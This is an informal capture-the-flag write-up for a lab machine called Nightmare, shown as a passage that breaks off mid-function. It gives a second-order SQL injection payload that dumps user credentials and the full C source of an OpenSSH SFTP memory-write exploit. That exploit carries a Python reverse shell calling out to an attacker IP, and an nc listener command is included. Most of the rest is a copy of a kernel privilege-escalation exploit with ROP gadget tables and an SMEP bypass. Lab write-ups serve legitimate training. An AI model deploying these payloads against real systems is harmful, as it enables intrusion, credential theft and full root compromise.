nightmarewriteups

1. lets begin the Nightmare
2. i find there is the second order sql injection in register page
3. open http://10.10.10.66/register.php
4. goto inspect element change user char maxlength="30" to "" than put in user field
5. username : ') UNION select table_schema,table_name FROM information_Schema.tables;#
6. password :any you want just register than login with same details
7. after login voila u find there is sysadmin user lets see what is inside there
8. to see the data logout first goto register page again and change the max length to unlimited
9. now put
10. username:') union select * from sysadmin.users#
11. password: anything u want
12. signup and login voila u found many username and password but i think ftpuser will work
13. ftpuser
14. @whereyougo?
15. that is sftp
16. we found exploit https://github.com/0x90/openssh-sftp-sploit/blob/master/sshsploit.c
17. need to modify
18. if (argc != 5) fprintf(stderr, "invocation: ./exploit host port user 'shell commands here'\n"), exit(1);
19. remove this on code
20. change and add
21. char target_host[] = "10.10.10.66";
22. char target_user[] = "ftpuser";
23. int port=2222;
24. char shell_commands[] = "/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.8\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'&";
25. printf("Commands: %s\n",shell_commands);
26. ssh_session my_ssh_session;
27. int rc;
28. char password[]="@whereyougo?";
29. // Authenticate ourselves
30. //password = "@whereyougo?";
31. rc = ssh_userauth_password(my_ssh_session, NULL, password);
32. if (rc != SSH_AUTH_SUCCESS)
33. remove /lib/x86_64-linux-gnu/libc-2.13.so this
34.  
35. change
36.  
37. unsigned int start_addr, end_addr, offset;
38. char *libc_path = NULL;
39. unsigned int stack_start_addr = 0, stack_end_addr;
40.  
41. char *system_offset_str;
42. slurp_file("system.addr", &system_offset_str);
43. unsigned int system_offset;
44. if (sscanf(system_offset_str, "%x", &system_offset) != 1) perror("scanf failed"), exit(1);
45. unsigned int remote_system_addr = start_addr+system_offset-offset;
46. printf("remote system() function is at %x\n", remote_system_addr);
47.  
48. printf("looking for ROP gadget `pop rdi;ret` (0x5fc3) in libc...\n");
49. char *gadget = memmem(libc+offset, end_addr-start_addr, "\x5f\xc3", 2);
50. if (gadget == NULL) fprintf(stderr, "no gadget found :(\n"), exit(1);
51. unsigned int gadget_address = start_addr + (gadget-(libc+offset));
52. unsigned int ret_address = gadget_address+1;
53. printf("found gadget at %x\n", gadget_address);
54.  
55. printf("remote stack is at %x-%x\n", stack_start_addr, stack_end_addr);
56. printf("doing it the quick-and-dirty way (that means: pray that the target"
57. "program was compiled with gcc, giving us 16-byte stack alignment)...\n");
58. unsigned int stack_len = stack_end_addr - stack_start_addr;
59. if (stack_len > 32000) {
60. stack_len = 32000;
61. stack_start_addr = stack_end_addr - stack_len;
62. }
63. printf("here1\n");
64.  
65. char *new_stack = malloc(stack_len);
66. printf("here2\n");
67. printf("sizeofint = %u\n",sizeof(int));
68. // first fill it with our ret slide
69. for (unsigned int *s = (void*)new_stack; s < (unsigned int*)(new_stack+stack_len); s++) {
70. *s = ret_address;
71. }
72.  
73. // put some shell commands in the head
74. strcpy(new_stack, shell_commands);
75.  
76. // put the mini-ROP-chain at the end
77. // [address of pop rdi] [stack head] [address of system]
78. unsigned int *se = (void*)(new_stack + stack_len);
79. se[-3] = remote_system_addr;
80. se[-2] = gadget_address;
81. se[-1] = stack_start_addr;
82.  
83. // now send over the rest right-to-left
84. for (unsigned int off = stack_len-32000; off >= 0; off -= 32000) {
85.  
86. after modify
87.  
88. let save it in shell.c
89. /*
90. OpenSSH <=6.6 SFTP misconfiguration exploit for 64bit Linux
91.  
92. Link:
93. http://seclists.org/fulldisclosure/2014/Oct/35
94. Build:
95. gcc sshsploit.c -o sshsploit -std=c99 -lssh
96. Usage:
97. ./ssh sploit host port user command
98. */
99.  
100. #define _GNU_SOURCE
101.  
102. // THIS PROGRAM IS NOT DESIGNED TO BE SAFE AGAINST VICTIM MACHINES THAT
103. // TRY TO ATTACK BACK, THE CODE IS SLOPPY!
104. // (In other words, please don't use this against other people's machines.)
105.  
106. #include <libssh/libssh.h>
107. #include <libssh/sftp.h>
108. #include <stdlib.h>
109. #include <stdio.h>
110. #include <sys/types.h>
111. #include <sys/stat.h>
112. #include <fcntl.h>
113. #include <string.h>
114. #include <errno.h>
115.  
116. #define min(a,b) (((a)<(b))?(a):(b))
117.  
118. sftp_session sftp;
119.  
120. size_t grab_file(char *rpath, char **out) {
121. size_t allocated = 4000, used = 0;
122. *out = calloc(1, allocated+1);
123. sftp_file f = sftp_open(sftp, rpath, O_RDONLY, 0);
124. if (f == NULL) fprintf(stderr, "Error opening remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
125. while (1) {
126. ssize_t nbytes = sftp_read(f, *out+used, allocated-used);
127. if (nbytes < 0) fprintf(stderr, "Error reading remote file %s: %s\n", rpath, ssh_get_error(sftp)), exit(1);
128. if (nbytes == 0) {
129. (*out)[used] = '\0';
130. sftp_close(f);
131. return used;
132. }
133. used += nbytes;
134. if (used == allocated) {
135. allocated *= 4;
136. *out = realloc(*out, allocated);
137. }
138. }
139. }
140.  
141. void dump_file(char *name, void *buf, size_t len) {
142. FILE *f = fopen(name, "w+");
143. if (!f) perror("can't write to local file"), exit(1);
144. if (fwrite(buf, 1, len, f) != len) fprintf(stderr, "local write failed\n"), exit(1);
145. if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
146. }
147.  
148. size_t slurp_file(char *path, char **out) {
149. size_t allocated = 4000, used = 0;
150. *out = calloc(1, allocated+1);
151. FILE *f = fopen(path, "r");
152. if (f == NULL) perror("opening local file failed"), exit(1);
153. while (1) {
154. ssize_t nbytes = fread(*out+used, 1, allocated-used, f);
155. if (nbytes < 0) fprintf(stderr, "Error reading local file %s: %s\n", path, strerror(errno)), exit(1);
156. if (nbytes == 0) {
157. (*out)[used] = '\0';
158. if (fclose(f)) fprintf(stderr, "fclose error\n"), exit(1);
159. return used;
160. }
161. used += nbytes;
162. if (used == allocated) {
163. allocated *= 4;
164. *out = realloc(*out, allocated);
165. }
166. }
167. }
168.  
169. int main(int argc, char **argv) {
170. char target_host[] = "10.10.10.66";
171. char target_user[] = "ftpuser";
172. int port=2222;
173. char shell_commands[] = "/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.8\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'&";
174. printf("Commands: %s\n",shell_commands);
175. int verbosity = SSH_LOG_PROTOCOL;
176.  
177. ssh_session my_ssh_session;
178. int rc;
179. char password[]="@whereyougo?";
180. // Open session and set options
181. my_ssh_session = ssh_new();
182. if (my_ssh_session == NULL) exit(-1);
183. ssh_options_set(my_ssh_session, SSH_OPTIONS_HOST, target_host);
184. ssh_options_set(my_ssh_session, SSH_OPTIONS_PORT, &port);
185. ssh_options_set(my_ssh_session, SSH_OPTIONS_USER, target_user);
186. ssh_options_set(my_ssh_session, SSH_OPTIONS_LOG_VERBOSITY, &verbosity);
187.  
188. // Connect to server
189. rc = ssh_connect(my_ssh_session);
190. if (rc != SSH_OK) fprintf(stderr, "Error connecting to host: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
191.  
192. // Authenticate ourselves
193. //password = "@whereyougo?";
194. rc = ssh_userauth_password(my_ssh_session, NULL, password);
195. if (rc != SSH_AUTH_SUCCESS)
196. fprintf(stderr, "Error authenticating with password: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
197.  
198. sftp = sftp_new(my_ssh_session);
199. if (sftp == NULL) fprintf(stderr, "Error allocating SFTP session: %s\n", ssh_get_error(my_ssh_session)), exit(-1);
200.  
201. rc = sftp_init(sftp);
202. if (rc != SSH_OK) {
203. fprintf(stderr, "Error initializing SFTP session: %s.\n", ssh_get_error(sftp));
204. sftp_free(sftp);
205. return rc;
206. }
207.  
208. char *mappings;
209. grab_file("/proc/self/maps", &mappings);
210. //printf("/proc/self/maps dump: \n%s\n\n\n", mappings);
211.  
212. printf("got /proc/self/maps. looking for libc...\n");
213. // 7fc9e742b000-7fc9e75ad000 r-xp 00000000 fe:00 2753466 /lib/x86_64-linux-gnu/libc-2.13.so
214. unsigned int start_addr, end_addr, offset;
215. char *libc_path = NULL;
216. unsigned int stack_start_addr = 0, stack_end_addr;
217. for (char *p = strtok(mappings, "\n"); p; p = strtok(NULL, "\n")) {
218. if (strstr(p, " r-xp ") && strstr(p, "/libc-")) {
219. if (libc_path) fprintf(stderr, "warning: two times libc?\n");
220. printf("mapping line: %s\n", p);
221. if (sscanf(p, "%x-%x %*4c %x", &start_addr, &end_addr, &offset) != 3) perror("scanf failed"), exit(1);
222. libc_path = strdup(strchr(p, '/'));
223. if (libc_path == NULL) fprintf(stderr, "no path in mapping?"), exit(1);
224. }
225. if (strstr(p, "[stack]")) {
226. if (stack_start_addr != 0) fprintf(stderr, "two stacks? no."), exit(1);
227. printf("mapping line: %s\n", p);
228. if (sscanf(p, "%x-%x ", &stack_start_addr, &stack_end_addr) != 2) perror("scanf failed"), exit(1);
229. }
230. }
231. if (libc_path == NULL) fprintf(stderr, "unable to find libc\n"), exit(1);
232. if (stack_start_addr == 0) fprintf(stderr, "unable to find stack"), exit(1);
233. printf("remote libc is at %s\n", libc_path);
234. printf("offset %x from libc is mapped to %x-%x\n", offset, start_addr, end_addr);
235.  
236. char *libc;
237. size_t libc_size = grab_file(libc_path, &libc);
238. dump_file("libc.so", libc, libc_size);
239. printf("downloaded libc, size is %zu bytes\n", libc_size);
240.  
241. system("objdump -T libc.so | grep ' system$' | cut -d' ' -f1 > system.addr");
242. char *system_offset_str;
243. slurp_file("system.addr", &system_offset_str);
244. unsigned int system_offset;
245. if (sscanf(system_offset_str, "%x", &system_offset) != 1) perror("scanf failed"), exit(1);
246. unsigned int remote_system_addr = start_addr+system_offset-offset;
247. printf("remote system() function is at %x\n", remote_system_addr);
248.  
249. printf("looking for ROP gadget `pop rdi;ret` (0x5fc3) in libc...\n");
250. char *gadget = memmem(libc+offset, end_addr-start_addr, "\x5f\xc3", 2);
251. if (gadget == NULL) fprintf(stderr, "no gadget found :(\n"), exit(1);
252. unsigned int gadget_address = start_addr + (gadget-(libc+offset));
253. unsigned int ret_address = gadget_address+1;
254. printf("found gadget at %x\n", gadget_address);
255.  
256. printf("remote stack is at %x-%x\n", stack_start_addr, stack_end_addr);
257. printf("doing it the quick-and-dirty way (that means: pray that the target"
258. "program was compiled with gcc, giving us 16-byte stack alignment)...\n");
259. unsigned int stack_len = stack_end_addr - stack_start_addr;
260. if (stack_len > 32000) {
261. stack_len = 32000;
262. stack_start_addr = stack_end_addr - stack_len;
263. }
264. printf("here1\n");
265.  
266. char *new_stack = malloc(stack_len);
267. printf("here2\n");
268. printf("sizeofint = %u\n",sizeof(int));
269. // first fill it with our ret slide
270. for (unsigned int *s = (void*)new_stack; s < (unsigned int*)(new_stack+stack_len); s++) {
271. *s = ret_address;
272. }
273.  
274. // put some shell commands in the head
275. strcpy(new_stack, shell_commands);
276.  
277. // put the mini-ROP-chain at the end
278. // [address of pop rdi] [stack head] [address of system]
279. unsigned int *se = (void*)(new_stack + stack_len);
280. se[-3] = remote_system_addr;
281. se[-2] = gadget_address;
282. se[-1] = stack_start_addr;
283.  
284. printf("Prepared the new stack. Now comes the moment of truth: push the new stack over and pray.\n");
285. sftp_file mem = sftp_open(sftp, "/proc/self/mem", O_RDWR, 0);
286. if (mem == NULL) fprintf(stderr, "Error opening remote memory: %s\n", ssh_get_error(sftp)), exit(1);
287.  
288. // first send over the string
289. rc = sftp_seek(mem, stack_start_addr);
290. if (rc) fprintf(stderr, "Error seeking to remote stack: %s\n", ssh_get_error(sftp)), exit(1);
291. ssize_t mem_written = sftp_write(mem, new_stack, strlen(shell_commands)+1);
292. if (mem_written != strlen(shell_commands)+1) fprintf(stderr, "didn't write the whole new stack\n");
293.  
294. // now send over the rest right-to-left
295. for (unsigned int off = stack_len-32000; off >= 0; off -= 32000) {
296. rc = sftp_seek(mem, stack_start_addr+off);
297. if (rc) fprintf(stderr, "Error seeking: %s\n", ssh_get_error(sftp)), exit(1);
298. mem_written = sftp_write(mem, new_stack+off, 32000);
299. if (mem_written != 32000) fprintf(stderr, "stack write failed – that's probably good :)\n"), exit(0);
300. }
301.  
302. return 0;
303. }
304.  
305. change your ip and and compiled it don't change port because nightmare doesn't accept any other port except 80 and 443
306. gcc shell.c -o shell -std=c99 -lssh
307. start nc
308. nc -lvnp 80
309. ./shell
310. u will get shell
311. after than
312. put on nc /usr/bin/sls -b '
313. bash -ip'
314. than u become decoder group shell
315. after than u can see user hash to get root we have to use kernel exploit
316. see there uname -an
317. after searching we get kernel exploit
318. https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
319. to see author link we will modify it https://ricklarabee.blogspot.in/2017/12/adapting-poc-for-cve-2017-1000112-to.html
320. now lets modify some details
321. change
322. // Will be overwritten by detect_versions().
323. int kernel = 38;
324. i think i have everything i have modified
325. now save this in poc.c in your system
326. // A proof-of-concept local root exploit for CVE-2017-1000112.
327. // Includes KASLR and SMEP bypasses. No SMAP bypass.
328. // Tested on Ubuntu trusty 4.4.0-* and Ubuntu xenial 4-8-0-* kernels.
329. //
330. // Usage:
331. // user@ubuntu:~$ uname -a
332. // Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
333. // user@ubuntu:~$ whoami
334. // user
335. // user@ubuntu:~$ id
336. // uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
337. // user@ubuntu:~$ gcc pwn.c -o pwn
338. // user@ubuntu:~$ ./pwn
339. // [.] starting
340. // [.] checking distro and kernel versions
341. // [.] kernel version '4.8.0-58-generic' detected
342. // [~] done, versions looks good
343. // [.] checking SMEP and SMAP
344. // [~] done, looks good
345. // [.] setting up namespace sandbox
346. // [~] done, namespace sandbox set up
347. // [.] KASLR bypass enabled, getting kernel addr
348. // [~] done, kernel text: ffffffffae400000
349. // [.] commit_creds: ffffffffae4a5d20
350. // [.] prepare_kernel_cred: ffffffffae4a6110
351. // [.] SMEP bypass enabled, mmapping fake stack
352. // [~] done, fake stack mmapped
353. // [.] executing payload ffffffffae40008d
354. // [~] done, should be root now
355. // [.] checking if we got root
356. // [+] got r00t ^_^
357. // root@ubuntu:/home/user# whoami
358. // root
359. // root@ubuntu:/home/user# id
360. // uid=0(root) gid=0(root) groups=0(root)
361. // root@ubuntu:/home/user# cat /etc/shadow
362. // root:!:17246:0:99999:7:::
363. // daemon:*:17212:0:99999:7:::
364. // bin:*:17212:0:99999:7:::
365. // sys:*:17212:0:99999:7:::
366. // ...
367. //
368. // Andrey Konovalov <andreyknvl@gmail.com>
369.  
370. #define _GNU_SOURCE
371.  
372. #include <assert.h>
373. #include <errno.h>
374. #include <fcntl.h>
375. #include <sched.h>
376. #include <stdarg.h>
377. #include <stdbool.h>
378. #include <stdint.h>
379. #include <stdio.h>
380. #include <stdlib.h>
381. #include <string.h>
382. #include <unistd.h>
383.  
384. #include <linux/socket.h>
385. #include <netinet/ip.h>
386. #include <sys/klog.h>
387. #include <sys/mman.h>
388. #include <sys/utsname.h>
389.  
390. #define ENABLE_KASLR_BYPASS 1
391. #define ENABLE_SMEP_BYPASS 1
392.  
393. // Will be overwritten if ENABLE_KASLR_BYPASS is enabled.
394. unsigned long KERNEL_BASE = 0xffffffff81000000ul;
395.  
396. // Will be overwritten by detect_versions().
397. int kernel = 38;
398.  
399. struct kernel_info {
400. const char* distro;
401. const char* version;
402. uint64_t commit_creds;
403. uint64_t prepare_kernel_cred;
404. uint64_t xchg_eax_esp_ret;
405. uint64_t pop_rdi_ret;
406. uint64_t mov_dword_ptr_rdi_eax_ret;
407. uint64_t mov_rax_cr4_ret;
408. uint64_t neg_rax_ret;
409. uint64_t pop_rcx_ret;
410. uint64_t or_rax_rcx_ret;
411. uint64_t xchg_eax_edi_ret;
412. uint64_t mov_cr4_rdi_ret;
413. uint64_t jmp_rcx;
414. };
415.  
416. struct kernel_info kernels[] = {
417. { "trusty", "4.4.0-21-generic", 0x9d7a0, 0x9da80, 0x4520a, 0x30f75, 0x109957, 0x1a7a0, 0x3d6b7a, 0x1cbfc, 0x76453, 0x49d4d, 0x61300, 0x1b91d },
418. { "trusty", "4.4.0-22-generic", 0x9d7e0, 0x9dac0, 0x4521a, 0x28c19d, 0x1099b7, 0x1a7f0, 0x3d781a, 0x1cc4c, 0x764b3, 0x49d5d, 0x61300, 0x48040 },
419. { "trusty", "4.4.0-24-generic", 0x9d5f0, 0x9d8d0, 0x4516a, 0x1026cd, 0x107757, 0x1a810, 0x3d7a9a, 0x1cc6c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
420. { "trusty", "4.4.0-28-generic", 0x9d760, 0x9da40, 0x4516a, 0x3dc58f, 0x1079a7, 0x1a830, 0x3d801a, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
421. { "trusty", "4.4.0-31-generic", 0x9d760, 0x9da40, 0x4516a, 0x3e223f, 0x1079a7, 0x1a830, 0x3ddcca, 0x1cc8c, 0x763b3, 0x49cbd, 0x612f0, 0x47fa0 },
422. { "trusty", "4.4.0-34-generic", 0x9d760, 0x9da40, 0x4510a, 0x355689, 0x1079a7, 0x1a830, 0x3ddd1a, 0x1cc8c, 0x763b3, 0x49c5d, 0x612f0, 0x47f40 },
423. { "trusty", "4.4.0-36-generic", 0x9d770, 0x9da50, 0x4510a, 0x1eec9d, 0x107a47, 0x1a830, 0x3de02a, 0x1cc8c, 0x763c3, 0x29595, 0x61300, 0x47f40 },
424. { "trusty", "4.4.0-38-generic", 0x9d820, 0x9db00, 0x4510a, 0x598fd, 0x107af7, 0x1a820, 0x3de8ca, 0x1cc7c, 0x76473, 0x49c5d, 0x61300, 0x1a77b },
425. { "trusty", "4.4.0-42-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3deb7a, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
426. { "trusty", "4.4.0-45-generic", 0x9d870, 0x9db50, 0x4510a, 0x5f13d, 0x107b17, 0x1a820, 0x3debda, 0x1cc7c, 0x76463, 0x49c5d, 0x61300, 0x1a77b },
427. { "trusty", "4.4.0-47-generic", 0x9d940, 0x9dc20, 0x4511a, 0x171f8d, 0x107bd7, 0x1a820, 0x3e241a, 0x1cc7c, 0x76463, 0x299f5, 0x61300, 0x1a77b },
428. { "trusty", "4.4.0-51-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
429. { "trusty", "4.4.0-53-generic", 0x9d920, 0x9dc00, 0x4511a, 0x21f15c, 0x107c77, 0x1a820, 0x3e280a, 0x1cc7c, 0x76463, 0x49c6d, 0x61300, 0x1a77b },
430. { "trusty", "4.4.0-57-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x39401d, 0x1097d7, 0x1a820, 0x3e527a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
431. { "trusty", "4.4.0-59-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dbc4e, 0x1097d7, 0x1a820, 0x3e571a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
432. { "trusty", "4.4.0-62-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x3ea46f, 0x109837, 0x1a820, 0x3e5e5a, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
433. { "trusty", "4.4.0-63-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
434. { "trusty", "4.4.0-64-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
435. { "trusty", "4.4.0-66-generic", 0x9ebe0, 0x9eec0, 0x4518a, 0x2e2e7d, 0x109847, 0x1a820, 0x3e61ba, 0x1cc7c, 0x77493, 0x49cdd, 0x62300, 0x1a77b },
436. { "trusty", "4.4.0-67-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x12a9dc, 0x109887, 0x1a820, 0x3e67ba, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
437. { "trusty", "4.4.0-70-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
438. { "trusty", "4.4.0-71-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
439. { "trusty", "4.4.0-72-generic", 0x9eb60, 0x9ee40, 0x4518a, 0xd61a2, 0x109887, 0x1a820, 0x3e63ca, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
440. { "trusty", "4.4.0-75-generic", 0x9eb60, 0x9ee40, 0x4518a, 0x303cfd, 0x1098a7, 0x1a820, 0x3e67ea, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
441. { "trusty", "4.4.0-78-generic", 0x9eb70, 0x9ee50, 0x4518a, 0x30366d, 0x1098b7, 0x1a820, 0x3e710a, 0x1cc7c, 0x774c3, 0x49cdd, 0x62330, 0x1a77b },
442. { "trusty", "4.4.0-79-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x3ebdcf, 0x1099a7, 0x1a830, 0x3e77ba, 0x1cc8c, 0x774e3, 0x49cdd, 0x62330, 0x1a78b },
443. { "trusty", "4.4.0-81-generic", 0x9ebb0, 0x9ee90, 0x4518a, 0x2dc688, 0x1099a7, 0x1a830, 0x3e789a, 0x1cc8c, 0x774e3, 0x24487, 0x62330, 0x1a78b },
444. { "trusty", "4.4.0-83-generic", 0x9ebc0, 0x9eea0, 0x451ca, 0x2dc6f5, 0x1099b7, 0x1a830, 0x3e78fa, 0x1cc8c, 0x77533, 0x49d1d, 0x62360, 0x1a78b },
445. { "xenial", "4.8.0-34-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
446. { "xenial", "4.8.0-36-generic", 0xa5d50, 0xa6140, 0x17d15, 0x6854d, 0x119227, 0x1b230, 0x4390da, 0x206c23, 0x7bcf3, 0x12c7f7, 0x64210, 0x49f80 },
447. { "xenial", "4.8.0-39-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
448. { "xenial", "4.8.0-41-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0xf3980, 0x1191f7, 0x1b170, 0x43996a, 0x2e8363, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
449. { "xenial", "4.8.0-45-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0xdfc5, 0x64210, 0x49f60 },
450. { "xenial", "4.8.0-46-generic", 0xa5cf0, 0xa60e0, 0x17c55, 0x100935, 0x1191f7, 0x1b170, 0x43999a, 0x185493, 0x7bcf3, 0x12c7c7, 0x64210, 0x49f60 },
451. { "xenial", "4.8.0-49-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x439bba, 0x102e33, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
452. { "xenial", "4.8.0-52-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x63e843, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
453. { "xenial", "4.8.0-54-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
454. { "xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
455. { "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },
456. };
457.  
458. // Used to get root privileges.
459. #define COMMIT_CREDS (KERNEL_BASE + kernels[kernel].commit_creds)
460. #define PREPARE_KERNEL_CRED (KERNEL_BASE + kernels[kernel].prepare_kernel_cred)
461.  
462. // Used when ENABLE_SMEP_BYPASS is used.
463. // - xchg eax, esp ; ret
464. // - pop rdi ; ret
465. // - mov dword ptr [rdi], eax ; ret
466. // - push rbp ; mov rbp, rsp ; mov rax, cr4 ; pop rbp ; ret
467. // - neg rax ; ret
468. // - pop rcx ; ret
469. // - or rax, rcx ; ret
470. // - xchg eax, edi ; ret
471. // - push rbp ; mov rbp, rsp ; mov cr4, rdi ; pop rbp ; ret
472. // - jmp rcx
473. #define XCHG_EAX_ESP_RET (KERNEL_BASE + kernels[kernel].xchg_eax_esp_ret)
474. #define POP_RDI_RET (KERNEL_BASE + kernels[kernel].pop_rdi_ret)
475. #define MOV_DWORD_PTR_RDI_EAX_RET (KERNEL_BASE + kernels[kernel].mov_dword_ptr_rdi_eax_ret)
476. #define MOV_RAX_CR4_RET (KERNEL_BASE + kernels[kernel].mov_rax_cr4_ret)
477. #define NEG_RAX_RET (KERNEL_BASE + kernels[kernel].neg_rax_ret)
478. #define POP_RCX_RET (KERNEL_BASE + kernels[kernel].pop_rcx_ret)
479. #define OR_RAX_RCX_RET (KERNEL_BASE + kernels[kernel].or_rax_rcx_ret)
480. #define XCHG_EAX_EDI_RET (KERNEL_BASE + kernels[kernel].xchg_eax_edi_ret)
481. #define MOV_CR4_RDI_RET (KERNEL_BASE + kernels[kernel].mov_cr4_rdi_ret)
482. #define JMP_RCX (KERNEL_BASE + kernels[kernel].jmp_rcx)
483.  
484. // * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *
485.  
486. typedef unsigned long __attribute__((regparm(3))) (*_commit_creds)(unsigned long cred);
487. typedef unsigned long __attribute__((regparm(3))) (*_prepare_kernel_cred)(unsigned long cred);
488.  
489. void get_root(void) {
490. ((_commit_creds)(COMMIT_CREDS))(
491. ((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0));
492. }
493.  
494. // * * * * * * * * * * * * * * * * SMEP bypass * * * * * * * * * * * * * * * *
495.  
496. uint64_t saved_esp;
497.  
498. // Unfortunately GCC does not support `__atribute__((naked))` on x86, which
499. // can be used to omit a function's prologue, so I had to use this weird
500. // wrapper hack as a workaround. Note: Clang does support it, which means it
501. // has better support of GCC attributes than GCC itself. Funny.
502. void wrapper() {
503. asm volatile (" \n\
504. payload: \n\
505. movq %%rbp, %%rax \n\
506. movq $0xffffffff00000000, %%rdx \n\
507. andq %%rdx, %%rax \n\
508. movq %0, %%rdx \n\
509. addq %%rdx, %%rax \n\
510. movq %%rax, %%rsp \n\
511. call get_root \n\
512. ret \n\
513. " : : "m"(saved_esp) : );
514. }
515.  
516. void payload();
517.  
518. #define CHAIN_SAVE_ESP \
519. *stack++ = POP_RDI_RET; \
520. *stack++ = (uint64_t)&saved_esp; \
521. *stack++ = MOV_DWORD_PTR_RDI_EAX_RET;
522.  
523. #define SMEP_MASK 0x100000
524.  
525. #define CHAIN_DISABLE_SMEP \
526. *stack++ = MOV_RAX_CR4_RET; \
527. *stack++ = NEG_RAX_RET; \
528. *stack++ = POP_RCX_RET; \
529. *stack++ = SMEP_MASK; \
530. *stack++ = OR_RAX_RCX_RET; \
531. *stack++ = NEG_RAX_RET; \
532. *stack++ = XCHG_EAX_EDI_RET; \
533. *stack++ = MOV_CR4_RDI_RET;
534.  
535. #define CHAIN_JMP_PAYLOAD \
536. *stack++ = POP_RCX_RET; \
537. *stack++ = (uint64_t)&payload; \
538. *stack++ = JMP_RCX;
539.  
540. void mmap_stack() {
541. uint64_t stack_aligned, stack_addr;
542. int page_size, stack_size, stack_offset;
543. uint64_t* stack;
544.  
545. page_size = getpagesize();
546.  
547. stack_aligned = (XCHG_EAX_ESP_RET & 0x00000000fffffffful) & ~(page_size - 1);
548. stack_addr = stack_aligned - page_size * 4;
549. stack_size = page_size * 8;
550. stack_offset = XCHG_EAX_ESP_RET % page_size;
551.  
552. stack = mmap((void*)stack_addr, stack_size, PROT_READ | PROT_WRITE,
553. MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
554. if (stack == MAP_FAILED || stack != (void*)stack_addr) {
555. perror("[-] mmap()");
556. exit(EXIT_FAILURE);
557. }
558.  
559. stack = (uint64_t*)((char*)stack_aligned + stack_offset);
560.  
561. CHAIN_SAVE_ESP;
562. CHAIN_DISABLE_SMEP;
563. CHAIN_JMP_PAYLOAD;
564. }
565.  
566. // * * * * * * * * * * * * * * syslog KASLR bypass * * * * * * * * * * * * * *
567.  
568. #define SYSLOG_ACTION_READ_ALL 3
569. #define SYSLOG_ACTION_SIZE_BUFFER 10
570.  
571. void mmap_syslog(char** buffer, int* size) {
